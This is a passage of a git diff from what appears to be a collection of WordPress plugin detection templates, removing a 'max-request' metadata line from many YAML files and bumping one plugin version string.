 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 http/technologies/wordpress/plugins/loginpress.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt
index 98b6180181..b89cbe1901 100644
--- a/helpers/wordpress/plugins/siteorigin-panels.txt
+++ b/helpers/wordpress/plugins/siteorigin-panels.txt
@@ -1 +1 @@
-2.25.3
\ No newline at end of file
+2.26.0
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
